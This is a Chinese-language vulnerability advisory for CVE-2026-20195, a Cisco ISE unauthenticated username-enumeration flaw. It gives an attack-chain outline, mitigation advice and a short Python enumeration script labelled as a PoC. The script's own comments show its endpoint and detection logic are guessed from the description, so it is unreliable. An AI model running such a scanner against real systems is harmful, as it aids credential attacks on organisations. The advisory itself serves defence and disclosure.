IPBUF安全漏洞报告
English
CVE-2026-20195 CVSS 5.3 中危

CVE-2026-20195 Cisco ISE 用户账户枚举漏洞

披露日期: 2026-05-06

漏洞信息

漏洞编号
CVE-2026-20195
漏洞类型
信息泄露
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Cisco ISE (Identity Services Engine)

相关标签

信息泄露用户枚举Cisco ISEAPI安全未授权访问

漏洞概述

Cisco ISE 身份管理 API 端点存在漏洞,允许未经认证的远程攻击者枚举受影响设备上的有效用户账户。由于受影响 API 端点在调用时会返回特定的错误消息,攻击者可通过发送精心构造的请求并分析差异化响应来利用此漏洞。成功利用后,攻击者能够编译出受影响系统上的有效用户名列表,为进一步攻击提供信息支持。

技术细节

该漏洞的根本原因在于 Cisco ISE 身份管理 API 端点的错误处理机制存在缺陷。当攻击者向受影响的端点发送请求时,系统会根据输入参数(如用户名)的有效性返回不同的错误消息或状态码。这种响应差异使得未经身份验证的攻击者能够通过自动化脚本发送大量探测请求。攻击者通过分析返回的响应内容,可以准确区分出系统中真实存在的用户名与无效的用户名。由于该漏洞无需用户交互且无需身份认证即可利用,攻击者可轻易地从远程发起枚举攻击,获取敏感的用户信息,从而为后续的暴力破解攻击或定向攻击奠定基础。

攻击链分析

STEP 1
侦察
攻击者识别目标 Cisco ISE 设备及其开放的 API 端点。
STEP 2
探测
攻击者向身份管理 API 端点发送一系列精心构造的请求,包含各种潜在的用户名。
STEP 3
分析
攻击者捕获并分析服务器返回的错误消息和响应状态,寻找响应内容上的差异。
STEP 4
枚举
根据响应差异,攻击者筛选出系统中真实存在的有效用户名,建立用户列表。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import sys # Target configuration # Replace with the actual vulnerable endpoint URL target_url = "https://<ise-ip>/admin/API/mgmt/identity/user" wordlist = ["admin", "cisco", "guest", "user", "test"] print("[*] Starting enumeration...") headers = { "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-20195-Scanner)", "Accept": "application/json" } for username in wordlist: # Crafting the request to probe the API endpoint # This payload is designed to trigger the error message differentiation try: response = requests.get(f"{target_url}/{username}", headers=headers, timeout=5, verify=False) # Analyzing the response based on the vulnerability description # Logic: Different error messages indicate valid vs invalid users if "Invalid user" not in response.text and response.status_code != 404: print(f"[+] Valid User Found: {username} (Status: {response.status_code})") else: print(f"[-] Invalid User: {username}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to {target_url}: {e}") sys.exit(1) print("[*] Scan complete.")

影响范围

Cisco ISE (具体受影响版本请查阅 Cisco Security Advisory cisco-sa-ise-unauth-bypass-uxjRXGpb)

防御指南

临时缓解措施
在未安装补丁前,建议管理员通过网络访问控制列表(ACL)严格限制对受影响 API 端点的访问,仅允许必要的内部管理 IP 访问。同时,应启用日志监控功能,对短时间内大量尝试访问用户接口的行为进行告警,以便及时发现潜在的枚举攻击。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表